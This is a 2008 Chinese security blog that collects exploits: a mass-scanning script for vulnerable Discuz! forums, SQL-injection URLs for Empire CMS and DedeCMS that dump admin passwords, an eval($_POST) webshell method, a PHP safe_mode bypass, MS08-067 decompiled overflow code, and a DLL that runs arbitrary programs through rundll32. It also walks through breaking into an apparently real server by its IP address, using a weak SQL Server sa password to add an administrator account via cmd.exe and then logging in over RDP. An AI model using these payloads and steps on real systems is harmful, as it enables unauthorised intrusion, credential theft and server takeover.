CNsHaRk BLog

完了,我的alexa排名,姚明啊

2008-11-22T12:50:48+08:00

站的排名从之前的几千万到现在的六十五万,跟姚明的成长速度没什么差别了,恐怖啊,
期待排到第一位

Discuz! 6.x/7.x $_DCACHE数组变量覆盖漏洞 Check

2008-11-22T02:34:02+08:00

发布时间:2008-11-15测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!#!/bin/bash

# Discuz! 6.x/7.x SODB-2008-13 Check
# By heihei@安全小站群
# 文件中google_page_count参数是 google搜索结果的页数，大于0就可以，太大了，google会认为是自动机#而停止处理！开启WAP注册的结果URL列表保存在当前目录下urllist
# 修正 cnb|rd@SEBUG
# 需要自己修改countPage，因为google_page_count多了google就以为是病毒呢
#
countPage=10
flag=0
while [ "$flag" -lt 10 ]; do
wget --no-cookies --user-agent="Mozilla/4.73 [en] (X11; U; Linux 2.2.15 i686)" "http://www.google.cn/search?hl=zh-CN&newwindow=1&q=inurl:bbs/wap/index.php+Powered+by+Discuz!&start=$countPage&sa=N" -O /tmp/t_url -T 7 -t 4
for url in $(sed 's_

]*href="[^"]\+\/index\.php\?_\n&\n_g' /tmp/t_url | grep "

do
  wget --no-cookies --post-data='action=register' -O /tmp/check -T 7 -t 4 "$url"
  if [ "$(grep "username" /tmp/check | wc -l)" != "0" ]; then
   echo "OK! $url "
   echo "OK : $url" >> urllist
  else
   echo "NO! $url "
  fi
done
countPage=$(($countPage+10))
flag=$(($flag+1))
done
rm -r /tmp/t_url /tmp/check
echo "in urllist"

exit 0
// Sebug.net [ 2008-11-19 ]

PHP 5.2.6 (error_log) safe_mode Bypass Vulnerabili

2008-11-22T02:32:42+08:00

发布时间:2008-11-20测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负![ SecurityReason.com PHP 5.2.6 (error_log) safe_mode bypass ]

Author: Maksymilian Arciemowicz (cXIb8O3)
securityreason.com
Date:
- - Written: 10.11.2008
- - Public: 20.11.2008

SecurityReason Research
SecurityAlert Id: 57

CWE: CWE-264
SecurityRisk: Medium

Affected Software: PHP 5.2.6
Advisory URL: http://securityreason.com/achievement_securityalert/57
Vendor: http://www.php.net

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl
with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web
developers to write dynamically generated pages quickly.

error_log

They allow you to define your own error handling rules, as well as modify the way the errors can
be logged. This allows you to change and enhance error reporting to suit your needs.

- --- 0. error_log const. bypassed by php_admin_flag ---
The main problem is between using safe_mode in global mode

php.ini:
safe_mode = On

and declaring via php_admin_flag

...
php_admin_flag safe_mode On

When we create some php script in /www/ and try call to:

ini_set("error_log", "/hack/");

or in /www/.htaccess

php_value error_log "/hack/bleh.php"

Result:

Warning: Unknown: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in Unknown on line 0

Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php on line 4

It was for safe_mode declared in php.ini. But if we use

php_admin_flag safe_mode On

in httpd.conf, we will get only

Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php on line 4

syntax in .htaccess

php_value error_log "/hack/blehx.php"

is allowed and bypass safe_mode.

example exploit:
error_log("", 0);

- --- 2. How to fix ---
Fixed in CVS

http://cvs.php.net/viewvc.cgi/php-src/NEWS?revision=1.2027.2.547.2.1315&view=markup

Note:
Do not use safe_mode as a main safety.

--- 3. Greets ---
sp3x Infospec schain p_e_a pi3

- --- 4. Contact ---
Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl

还普遍存在的帝国cms漏洞

2008-11-22T02:24:10+08:00

发布时间:2008-08-17
影响版本:
帝国ECMS 5.0
漏洞描述:
漏洞文件 /e/member/list/index.php文件:
内容如下：
if($sear)
{
$keyboard=RepPostVar2($_GET['keyboard']);
if($keyboard)
{
$add.=$where.$user_username." like '%$keyboard%'";
}
$search.="&sear=1&keyboard=$keyboard";
}

判断sear参数是否存在,然后直接去keyboard的参数,然后再判断keyboard值是否为空,如果不为
空就直接把keyboard带入查询产生注射漏洞.
<*参考
http://www.sebug.net/vulndb/3860/
http://www.nukeblog.cn
*>
SEBUG安全建议:
暂无
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!/e/member/list/index.php?sear=1&totalnum=1&keyboard=%D9'+union+select+1,1,1,concat(char
(123),userid,char(95),username,char(95),password,char(125))+from+phome_enewsuser/*

SmbRelay3 NTLM Replay Attack Tool/Exploit (MS08-06

2008-11-21T15:15:31+08:00

* SMBRELAY 3 - NTLM replay attack (version 1.0 ) public version
* (c) 2008 Andres Tarasco Acuña ( atarasco _at_ gmail.com )
* URL: http://tarasco.org/Web/tools.html

http://milw0rm.com/sploits/2008-smbrelay3.zip

# milw0rm.com [2008-11-14]

关于Discuz!6.1的漏洞分析

2008-11-21T14:57:03+08:00

Discuz!_6.1.0出现了可以直接拿WEBSHELL的ODAY...

其实，这在意料之中，因为DZ以前的版本就频繁暴出ODAY

分析DZ所有ODAY，然后进行对比....

我们会发现，有很多ODAY都是出在过滤方面...

今天在群里跟朋友讨论关于DZ的ODAY，让我忽然对这东西很感兴趣...

下面进行简要分析：

仔细对比了DZ5.5以后的版本，发现从过滤方面拿ODAY最容易，也最合理！

DZ的预安装版本都会出现如下问题

1.安全提问都会默认未设置

2.默认开启在线编辑模板

3.默认开启运行SQL语句

系统后台会提示修改（config.inc.php）......大家不难发现......

突破思路的地方就在（config.inc.php)，关键看你能不能发现！

现在假设，你进入后台，而白痴的管理员正好开启在线编辑模板

有机会了，但不要高兴的太早......

曾经有一种方法是这么做的，如下：

1.后台编辑customfaq(customfaq.lang.php文件)

   在“2.后台编辑misc(misc.lang.php文件)

   把“post_reply_quote”对应的内容改为复制内容到剪贴板代码:“;eval($_POST[c]);”在前台回帖处选择引用回复。简单看下代码：

include/newreply.inc.php 107行：

复制内容到剪贴板代码:
eval("\$language['post_reply_quote'] = \"$language[post_reply_quote]\";");

大家有没有发现，这是一个天然的后门......

上面的方法以前能用，现在不行了，因为DZ已经打了安全补丁。。。

但是。。。到目前为止，预安装DZ系统仍然默认开启在线编辑模板

有很多白痴管理员都不懂得关闭这个安全隐患...也为很多黑手留下了发挥的空间...

列举的方法只是一种思路，不能照步就办...我们可以学习...

从那种方法中，我们可以看出，作者仍然是利用了过滤漏洞...

我们可以从其他的编辑模板的地方加以利用，至于具体怎么利用...

透露一点，可以从论坛的报告处下手，原理和我所列举的例子基本一样！

dedecms gbk版0day

2008-11-18T10:18:45+08:00

一个月前看了看了dedecms代码（只看了plus下的文件），发现有些变量人为控制没有过滤，但是在php的魔法引号这道天然屏障面前利用几率不好,但是联想到gbk的宽字符，突破方法就有了.

漏洞文件：plus/infosearch.php

测试版本：5.1 gbk

描述：$q变量没有过滤直接进入查询，导致注入出现。代码如下：

PHP代码

$q = trim($q);if($areaid > 0) {$wheresql = "areaid=$areaid and ";}$query = "select ID,typeid,title,memberID,writer,senddate from #@__infos where $wheresql title like '%$q%' order by senddate desc";$dlist = new DataList();$dlist->pageSize = 20;$dlist->SetParameter("q",$q);$dlist->SetParameter("action",'search');$dlist->SetParameter("areaid",$areaid);$dlist->SetSource($query);“‘”突破了，那就照常注入。

测试站：
http://www.xxx.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,id,4,pwd,6%20from%20dede_admin/*

至于后台拿shell,找不到后台的一样可以轻松拿到shell.不会的留言。

还有几个文件存在注入问题，象feedback.php,后续发放分析。

MS08067补丁前后比较分析结果

2008-11-18T10:11:57+08:00

MS08-067： Server 服务中的漏洞可能允许远程代码执行
http://www.microsoft.com/china/technet/security/bulletin/MS08-067.mspx
这条更新为重要，可以说与当年的冲击波类似。上午我对补丁前后分析，定位到微软修改过的函数结果如下：

发生缓冲区溢出的函数：
signed int __stdcall sub_5FDDA180(int a1, wchar_t *a2, int a3, int a4, int a5)
{
wchar_t *v5; // ebx@1
size_t v6; // edi@1
int v7; // esi@1
int v8; // edi@3
signed int result; // eax@4
wchar_t *v10; // eax@5
unsigned int v11; // eax@10
size_t v12; // eax@14
__int16 v13; // ax@16
size_t v14; // eax@3
int v15; // [sp+428h] [bp-4h]@1
wchar_t *v16; // [sp+10h] [bp-41Ch]@1
int v17; // [sp+Ch] [bp-420h]@1
wchar_t v18; // [sp+14h] [bp-418h]@2

v5 = a2;
v15 = dword_5FE1E18C;
v7 = a1;
v16 = (wchar_t *)a3;
v6 = 0;
v17 = a5;
if ( a1 && *(_WORD *)a1 )
{
v12 = wcslen((const wchar_t *)a1);
v6 = v12;
if ( v12 )
{
if ( v12 > 0x208 )
return 123;
wcscpy(&v18, (const wchar_t *)v7);
v13 = LOWORD((&v16)[v6 + 1]);
if ( v13 != 92 )
{
if ( v13 != 47 )
{
wcscat(&v18, &word_5FDECBD4);
++v6;
}
}
if ( *v5 == 92 || *v5 == 47 )
++v5;
}
}
else
{
v18 = 0;
}
v14 = wcslen(v5);
v8 = v14 + v6;
if ( v8 < v14 )
return 123;
if ( (unsigned int)v8 > 0x207 )
return 123;
wcscat(&v18, v5);
v10 = &v18;
if ( v18 )
{
do
{
if ( *v10 == 47 )
*v10 = 92;
++v10;
}
while ( *v10 );
}
if ( !sub_5FDD9F7A(&v18) && !sub_5FDDA26B((int)&v18) )//这个函数修改过了
return 123;
v11 = 2 * wcslen(&v18) + 2;
if ( v11 > a4 )
{
if ( v17 )
*(_DWORD *)v17 = v11;
result = 2123;
}
else
{
wcscpy(v16, &v18);//缓冲区溢出点
result = 0;
}
return result;
}

被修改的函数：
//----- (5FDDA26B) --------------------------------------------------------
signed int __stdcall sub_5FDDA26B(int a1)
{
wchar_t v1; // ax@1
int v2; // ecx@1
int v3; // ebx@1
int v4; // edi@1
int v5; // esi@3
int v6; // eax@10
__int16 v7; // dx@10
__int16 v8; // bx@11
__int16 v10; // dx@17
int v11; // ecx@18
__int16 v12; // ax@19
int v13; // eax@34
wchar_t *v14; // ecx@41
char v15; // zf@1
int v16; // [sp+Ch] [bp-4h]@1

v2 = a1;
v1 = *(_WORD *)a1;
v3 = 0;
v4 = 0;
v15 = *(_WORD *)a1 == 92;
v16 = 0;
if ( v15 || v1 == 47 )
{
v10 = *(_WORD *)(a1 + 2);
if ( v10 == 92 || v10 == 47 )
{
v11 = a1 + 4;
while ( 1 )
{
v12 = *(_WORD *)v11;
if ( *(_WORD *)v11 == 92 )
break;
if ( v12 == 47 )
break;
if ( !v12 )
return 0;
v11 += 2;
}
if ( !*(_WORD *)v11 || (v2 = v11 + 2, v1 = *(_WORD *)v2, a1 = v2, v1 == 92) || v1 == 47 )
return 0;
}
}
v5 = v2;
if ( !v1 )
return 1;
while ( 1 )
{
if ( v1 == 92 )
{
if ( v3 == v5 - 2 )
return 0;
v4 = v3;
v16 = v5;
goto LABEL_6;
}
if ( v1 != 46 || v3 != v5 - 2 && v5 != v2 )
goto LABEL_6;
v6 = v5 + 2;
v7 = *(_WORD *)(v5 + 2);
if ( v7 == 46 )
{
v8 = *(_WORD *)(v5 + 4);
if ( v8 == 92 || !v8 )
{
if ( !v4 )
return 0;
wcscpy((wchar_t *)v4, (const wchar_t *)(v5 + 4)); //可能会发生缓冲区溢出
if ( !v8 )
return 1;
v16 = v4;
v5 = v4;
v13 = v4 - 2;
while ( *(_WORD *)v13 != 92 && v13 != a1 )
v13 -= 2;
v2 = a1;
v4 = v13 & -(*(_WORD *)v13 == 92);
}
goto LABEL_6;
}
if ( v7 != 92 )
break;
if ( v3 )
{
v14 = (wchar_t *)v3;
}
else
{
v6 = v5 + 4;
v14 = (wchar_t *)v5;
}
wcscpy(v14, (const wchar_t *)v6);//可能会发生缓冲区溢出
v2 = a1;
LABEL_7:
v1 = *(_WORD *)v5;
if ( !*(_WORD *)v5 )
return 1;
v3 = v16;
}
if ( v7 )
{
LABEL_6:
v5 += 2;
goto LABEL_7;
}
if ( v3 )
v5 = v3;
*(_WORD *)v5 = 0;
return 1;
}

当sa存储扩展被删除后

2008-11-18T10:10:55+08:00

当sa存储扩展被删除后....sa弱口令相关命令
可不知道大家有无这样的经历？当用sql综合利用工具连接成功后，有的能直接执行命令，创建帐户，

有的执行命令时却遇上下面种种情况而使你辛苦扫得的sa 弱口令失效，功亏一篑~

例如执行命令后回显1：未能找到存储过程"master..xpcmdshell".

回显2：无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126（找不到指定模块。）

回显3：拒绝了对对象 "xp_cmdshell"（数据库 "master"，所有者 "dbo"）的 EXECUTE 权限。

等等可能还有些吧。这几个比较常见。
碰上这种情况，小菜们就变得无所适从了，棰胸跺足，甚至侮辱斯文，臭骂管理员。。。

呵呵，俺认为，回显1，2一般要么是管理员lj，要么是中级菜友的杰作，一般都是可以恢复的shell。回显3可就是经典作品了，把sa的权限降低了，与systemadmin脱离了联系。。。对于这种情况，俺还没有更好的解决办法。（哪位大哥知道麻烦告诉我一声^_^）

下面我就具体演示一下我是怎么对付这样的情况的。
用到的工具：sql查询分离器休闲庄专用版。

怕大家找不到，我把下载地址给大家

SQL查询分析器休闲庄分离版本

http://soft.7747.net/ware/774710/sqlquery.zip

假如我们扫到了：

[219.84.135.161]: 发现SQL-Server弱口令 "sa/[口令与用户名相同]"
[219.84.135.161]: "SQL-Server弱口令"扫描完成, 发现 1.

还开了3389！
先打开sql综合利用工具
连接试试

看，连接成功。

执行命令时，回显

無法載入 DLL C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplo.dll，或是參考到某個 DLL 。原因: 126(找不到指定的模組。)。

这个时候，我们就没办法再继续下去了。

下面打开sql查询分离器
登陆进去
出来一个白白的这个。。。
呵呵
哦。
这个ip是开了3389的。
我们先登陆3389看是否成功。
忘记讲了
看。windows2000的server版

好了。我们再在sql查询分离器中输入命令
declare @shell int exec sp_oacreate "wscript.shell",@shell output exec sp_oamethod @shell,"run",null,"c:\winnt\system32\cmd.exe /c net user test 123 /add"
这个命令就是创建一个用户名为test，密码为123的用户，
输入后按F5
我们看到回显有个这个表格样的东东，0。这样的。
这就表示成功了。如果回显“命令成功完成”，反而是没有成功~
呵呵不要上当哦。
下面提升test的权限
输入命令
declare @shell int exec sp_oacreate "wscript.shell",@shell output exec sp_oamethod @shell,"run",null,"c:\winnt\system32\cmd.exe /c net localgroup administrators test /add"

把test提升为管理员

按F5执行命令，回显和刚才一样。。。

下面我们登陆3389
用帐户test
密码123

看能不能登陆，看。。。。
进去了吧。。。
呵呵。。。

**********************************************************************************

sa弱口令相关命令
总结的一些关于sa弱口令相关命令.
注:具体问题具体分析,以上方法仅供参考,不一定有效,相关原理知识请自行查找。重要提示！以上提供的方法仅供学习研究！请大家不要进行任何破坏国内主机的违法行为！否则一切后果自负！转载请保留此信息。

一.更改sa口令方法：
用sql综合利用工具连接后，执行命令：
exec sp_password NULL,"新密码","sa"
(提示：慎用!)

二.简单修补sa弱口令.

方法1:查询分离器连接后执行：
if exists (select * from
dbo.sysobjects where id = object_id(N"[dbo].[xp_cmdshell]") and
OBJECTPROPERTY(id, N"IsExtendedProc") = 1)

exec sp_dropextendedproc N"[dbo].[xp_cmdshell]"

GO

然后按F5键命令执行完毕

方法2:查询分离器连接后
第一步执行：use master
第二步执行：sp_dropextendedproc "xp_cmdshell"
然后按F5键命令执行完毕

三.常见情况恢复执行xp_cmdshell.

1　未能找到存储过程"master..xpcmdshell".
　恢复方法：查询分离器连接后,
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ="xplog70.dll"declare @o int
第二步执行:sp_addextendedproc "xp_cmdshell", "xpsql70.dll"
然后按F5键命令执行完毕

2　无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126（找不到指定模块。）
　恢复方法：查询分离器连接后,
第一步执行：sp_dropextendedproc "xp_cmdshell"
第二步执行：sp_addextendedproc "xp_cmdshell", "xpsql70.dll"
然后按F5键命令执行完毕

3　无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
恢复方法：查询分离器连接后,
第一步执行:exec sp_dropextendedproc "xp_cmdshell"
第二步执行:exec sp_addextendedproc "xp_cmdshell","xpweb70.dll"　　　　　　
然后按F5键命令执行完毕

四.终极方法.
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
查询分离器连接后,
2000servser系统:
declare @shell int exec sp_oacreate "wscript.shell",@shell output exec sp_oamethod @shell,"run",null,"c:\winnt\system32\cmd.exe /c net user 新用户密码 /add"

declare @shell int exec sp_oacreate "wscript.shell",@shell output exec sp_oamethod @shell,"run",null,"c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add"

xp或2003server系统:

declare @shell int exec sp_oacreate "wscript.shell",@shell output exec sp_oamethod @shell,"run",null,"c:\windows\system32\cmd.exe /c net user 新用户密码 /add"

declare @shell int exec sp_oacreate "wscript.shell",@shell output exec sp_oamethod @shell,"run",null,"c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add"

艰难的在webshell中执行程序

2008-11-18T10:01:22+08:00

摘要：一个web shell，系统权限设置得很好，常用的exe都无权执行。可写目录传上去的exe文件，也没有执行权限。最终发现设置权限的时候漏掉了rundll32.exe，如是就写了这个个代码。

测试开始的时候，PHP似乎没权执行命令。本来打算用php本身的一些溢出问题，溢出一个低权限的shell来的。后来意外发现使用proc_open函数可以执行一些内部命令，只是外部命令和目录都做了比较严格的权限设置而已。于是就测试可能可以利用的外部命令，最终测试到了rundll32.exe程序，终于没有返回权限不足。写一个dll，给rundll32调用，就可以间接的执行自己上传的任意exe文件了。也许是windows权限的一点小问题？毕竟使用rundll32间接执行的exe，身份还是php shell的guest权限，虽然调用者变了——真正原因有待进一步研究

/*************************************************************************************************
* 遇到一个服务器权限设置很畸形，系统exe基本都无法执行，自己上传的exe到可写目录，也不能执行。
* 遗憾的是，他们漏掉了rundll32.exe这个文件的权限，如是……
* code by wustyunshu###hotmail.com, 2008,11,13,23:20
*************************************************************************************************/

#include
#include
#include

// dll入口
BOOL APIENTRY DllMain( HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved )
{
return true;
}

void RunExe( HWND hwnd, HINSTANCE hinst, LPSTR szCmdLine, int nCmdShow)
{
if( szCmdLine == NULL )
{
return;
}

DWORD dwNum = MultiByteToWideChar(CP_ACP, 0, szCmdLine, -1, NULL, 0);
wchar_t *wszCmdLine = new wchar_t[dwNum];
if(!wszCmdLine)
{
return;
}
MultiByteToWideChar(CP_ACP, 0, szCmdLine, -1, wszCmdLine, dwNum);

int argc;
LPWSTR *argv = CommandLineToArgvW( wszCmdLine, &argc );

wchar_t Cmd[256] = { 0 };
wchar_t Args[1024] = { 0 };

//strncpy( Cmd, argv[0], sizeof(Cmd)-1 );
wcsncpy( Cmd, argv[0], sizeof(Cmd)-1 );
if( argc > 1 )
{
for( int index = 1; index < argc; index ++ )
{
wcscat( wcscat( Args, L" " ), argv[index] );
}
}

STARTUPINFO si;
memset( (void *)&si, 0, sizeof(STARTUPINFOA) );
GetStartupInfoW( &si );

//新进程输入输出重定向
si.cb = sizeof( si );
si.dwFlags = STARTF_USESHOWWINDOW;
//si.wShowWindow = SW_HIDE;

PROCESS_INFORMATION processInfo;
memset( (void *)&processInfo, 0, sizeof(PROCESS_INFORMATION) );

//建立进程
CreateProcessW( Cmd, Args, NULL, NULL, 1, 0, NULL, NULL, &si, &processInfo );

Sleep( 60 * 1000 );
TerminateProcess( processInfo.hProcess, 0 );
}